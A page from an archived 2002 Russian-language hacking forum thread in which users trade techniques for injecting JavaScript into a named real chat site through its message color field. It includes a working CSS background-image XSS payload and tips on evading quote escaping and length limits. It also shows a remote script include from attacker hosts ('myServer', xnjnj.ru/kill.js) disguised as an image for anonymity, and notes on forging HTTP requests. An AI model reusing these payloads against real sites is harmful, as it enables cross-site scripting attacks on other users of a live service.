ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
Перезагрузить страницу www.farit.ru -подскажите, это будет справедливо...
   
Закрытая тема
Страница 3 из 5 < 1 2 3 4 5 >
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 06.06.2002, 02:59
mifan
Познающий
Регистрация: 27.05.2002
Сообщений: 80
Провел на форуме:
0

Репутация: 28
Отправить сообщение для mifan с помощью ICQ
По умолчанию
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июня 05 2002,17:16)</td></tr><tr><td id="QUOTE">Предыдущее общение можно стереть (я дурак)...

Вопросик, хочу написать скарипт посложнее...
Вот такой вот работает (через цвет):
цвет=&quot;background-image:url(javascript:document.write(unescape('%3C' )+'script'+unescape('%3E')+'alert()'+';'+'alert()' +unescape('%3C')+'/script'+unescape('%3E') ))&quot;&quot;

В чате он превращается в
color:;background-image:url(javascript:document.write(unescape(&amp; #39;%3C&amp;#39;)+&amp;#39;script&amp;#39;+unescap e(&amp;#39;%3E&amp;#39;)+&amp;#39;alert()&amp;#39; +&amp;#39;;&amp;#39;+&amp;#39;alert()&amp;#39;+une scape(&amp;#39;%3C&amp;#39;)+&amp;#39;/script&amp;#39;+unescape(&amp;#39;%3E&amp;#39;) ));

Но все равно работает. Но вот когда я забиваю внутрь alert
что нибудь типа alert ('kkk') то он преврfщается в неисполнимый (т.е. ' чат внутри алерта меняет на &amp;#39) и скрипт не испольняется. Как быть не подскажите?[/QUOTE]<span id='postcolor'>
можетЪ я тупой, но как этот вонючий чат можно взломать через цвет если максимум можно вписать только 30 символов??????????????
 

  #22  
Старый 06.06.2002, 12:19
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (mifan @ июня 06 2002,02:54)</td></tr><tr><td id="QUOTE">странно а пачиму у меня не пашет с ', а только с &quot;, может руки кривые?[/QUOTE]<span id='postcolor'>
Нужно писать не ' а `
 

  #23  
Старый 06.06.2002, 12:43
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (mifan @ июня 06 2002,02:59)</td></tr><tr><td id="QUOTE">можетЪ я тупой, но как этот вонючий чат можно взломать через цвет если максимум можно вписать только 30 символов??????????????[/QUOTE]<span id='postcolor'>
По моему там пропускается больше символов.
Но в принципе, если поле обрезает длинну скрипта, то все равно можно вставить скрипт неограниченной длинны.
Например вставив такой скрипт: document.write('&lt; script src=&quot;http://myServer/a.js&quot;&gt;&lt;/script&gt;')
А в файл a.js можно засунуть скрипт любой длинны.

Тут еще могу сказать следующее: если тег требует закрывающего, например &lt; script&gt;&lt;/script&gt;, то такую запись можно сократить до такого вида &lt; script/&gt;. Эти два вида записи эквивалентны, но вторая существенно короче.

Таким образов первый пример можно еще сократить до такого:
document.write('&lt; script src=&quot;http://myServer/a.js&quot;/&gt;')
 

  #24  
Старый 06.06.2002, 13:57
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию
Насчет .js я только хотел написать... а ты меня опередил. До этого я и сам додумался! Гы-гы-гы. Сейчас разрабатываю соотв код. Вот только одна загвоздка - как бы вместо фоток (в профиле пользователя). Точнее в тот же каталог сунуть *.js . Может это просто? Это желательно что бы не подгружать *.js из другого сайта (что бы не было подозрительно). Вот было бы здорово! К сожаление js вместо jpg подсунуть не получается - скрипты закачки сами размер меняют... и портят. Зато #60;script src=&quot;http://www.xnjnj.ru/kill.js&quot;&gt; можно поменять на
#60;script src=&quot;http://www.xnjnj.ru/smile.gif&quot;&gt; (и переименовать соотв js на сайте-базе). Работать будет (это я для пущей анаонимности). Algol, а как ты сохранил фрейм? Я так и не понял. Использую Proxomitron (firewall оригинальный), который &quot;на лету&quot; меняет html-ки. Вот так вот обошел необходимость менять вид фрейма (для подстановки цветов).
 

  #25  
Старый 06.06.2002, 14:02
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июня 06 2002,13:57)</td></tr><tr><td id="QUOTE">Algol, а как ты сохранил фрейм?[/QUOTE]<span id='postcolor'>
Еще раз говорю: я не сохраняю фреймы, я подделываю HTTP запросы
 

  #26  
Старый 06.06.2002, 15:41
mifan
Познающий
Регистрация: 27.05.2002
Сообщений: 80
Провел на форуме:
0

Репутация: 28
Отправить сообщение для mifan с помощью ICQ
По умолчанию
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Нужно писать не ' а ` [/QUOTE]<span id='postcolor'>

я делал через копипейст, ошибиться не мог
 

  #27  
Старый 06.06.2002, 16:18
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию
&quot;Я подделываю http-запросы&quot;. Понял..
Оказывается Proxomitron похоже умеет тоже самое делать... попробую. В принципе тут видимо нужно перехватывать метод POST и все...
 

  #28  
Старый 06.06.2002, 19:22
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию
Единственное что не понял, почему джаваскрипт в поле бэкграунда будучи посланным в чат срабатывает только один раз (т.е. если посылаю второй раз - не срабатывает).??
 

  #29  
Старый 07.06.2002, 11:30
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июня 06 2002,19:22)</td></tr><tr><td id="QUOTE">Единственное что не понял, почему джаваскрипт в поле бэкграунда будучи посланным в чат срабатывает только один раз (т.е. если посылаю второй раз - не срабатывает).??[/QUOTE]<span id='postcolor'>
Быть такого не может ...
Возможно там просто стоит защита от флуда, поэтому текст сообщения нужно менять постоянно ...
 

  #30  
Старый 07.06.2002, 17:24
subscribe1
Новичок
Регистрация: 03.06.2002
Сообщений: 11
Провел на форуме:
0

Репутация: 0
По умолчанию
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ июня 07 2002,11:30)</td></tr><tr><td id="QUOTE"></span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июня 06 2002,19:22)</td></tr><tr><td id="QUOTE">Единственное что не понял, почему джаваскрипт в поле бэкграунда будучи посланным в чат срабатывает только один раз (т.е. если посылаю второй раз - не срабатывает).??[/QUOTE]<span id='postcolor'>
Быть такого не может ...
Возможно там просто стоит защита от флуда, поэтому текст сообщения нужно менять постоянно ...[/QUOTE]<span id='postcolor'>
Дело такое - проксиметрон &quot;на лету&quot; меняет нижний фрейм (для одного из цветов делает подстановку в виде javascript). Потом в чат я посылаю сообщение - скрипт выполняется, а вот когда посылаю вотрой раз (текст сообщения другой но color;javascript.... такой же). Он уже не выпоняется.!
 
Закрытая тема
Страница 3 из 5 < 1 2 3 4 5 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ